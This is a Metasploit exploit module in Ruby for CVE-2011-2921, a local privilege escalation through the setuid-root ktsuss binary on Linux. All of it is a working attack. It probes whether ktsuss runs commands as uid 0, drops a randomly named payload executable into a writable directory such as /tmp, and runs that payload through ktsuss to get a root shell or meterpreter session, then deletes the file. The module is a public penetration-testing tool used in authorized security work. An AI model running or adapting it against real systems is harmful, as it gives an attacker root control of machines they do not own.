Path: blob/master/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
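##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation via a setuid-root ktsuss binary that executes
# user-supplied commands without dropping privileges (CVE-2011-2921, see
# 'References' below). The module drops a payload executable into a writable
# directory and asks ktsuss to run it; the dropped file is registered with
# FileDropper so it is removed on cleanup.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ktsuss suid Privilege Escalation',
        'Description' => %q{
          This module attempts to gain root privileges by exploiting
          a vulnerability in ktsuss versions 1.4 and prior.

          The ktsuss executable is setuid root and does not drop
          privileges prior to executing user specified commands,
          resulting in command execution with root privileges.

          This module has been tested successfully on:

          ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
          ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'John Lightsey', # Discovery and exploit
          'bcoles' # Metasploit
        ],
        'DisclosureDate' => '2011-08-13',
        'References' => [
          ['CVE', '2011-2921'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
          ['URL', 'https://security.gentoo.org/glsa/201201-15'],
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
        ],
        'Platform' => ['linux'],
        'Arch' => [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_RISCV64LE,
          ARCH_RISCV32LE,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
        'SessionTypes' => ['shell', 'meterpreter'],
        'Targets' => [['Auto', {}]],
        'DefaultOptions' => {
          'AppendExit' => true,
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependSetreuid' => true,
          'PrependSetuid' => true,
          'PrependFork' => true
        },
        'Notes' => {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        },
        'DefaultTarget' => 0
      )
    )
    register_options [
      # Fixed: the description previously said "staprun" (copy-paste from another module).
      OptString.new('KTSUSS_PATH', [true, 'Path to ktsuss executable', '/usr/bin/ktsuss'])
    ]
    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  # @return [String] path to the ktsuss binary, from the KTSUSS_PATH option
  def ktsuss_path
    datastore['KTSUSS_PATH']
  end

  # @return [String] directory the payload is written to, from the WritableDir option
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Write +data+ to +path+ on the target, replacing any existing file, and
  # register it for removal when the module cleans up.
  #
  # @param path [String] remote destination path
  # @param data [String] file contents
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  # Upload +data+ to +path+ and mark it executable.
  #
  # @param path [String] remote destination path
  # @param data [String] file contents
  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  # Determine whether the target ktsuss is vulnerable.
  #
  # The binary must exist and be setuid; it is then asked to run `id` as the
  # current user. A vulnerable ktsuss reports uid=0, because it never drops
  # the root privileges it gained from the setuid bit.
  #
  # @return [CheckCode] Safe unless the probe ran as uid 0, then Vulnerable
  def check
    return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path
    return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path

    vprint_good "#{ktsuss_path} is setuid"

    id = cmd_exec 'whoami'
    res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
    vprint_status res

    unless res.include? 'uid=0'
      return CheckCode::Safe('ktsuss does not appear to be exploitable')
    end

    CheckCode::Vulnerable("ktsuss is exploitable")
  end

  # Drop the payload executable into WritableDir and run it through ktsuss.
  #
  # Refuses to run when the session is already root (unless ForceExploit is
  # set) or when WritableDir is not writable.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on a bad configuration
  def exploit
    if !datastore['ForceExploit'] && is_root?
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
    end

    unless writable? base_dir
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    # Random dot-prefixed name; the file is removed by FileDropper on cleanup.
    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload ...'
    id = cmd_exec 'whoami'
    # The payload is backgrounded with '&'; the trailing echo presumably gives
    # cmd_exec output to return on so the session is not blocked — confirm.
    res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
    vprint_line res
  end
end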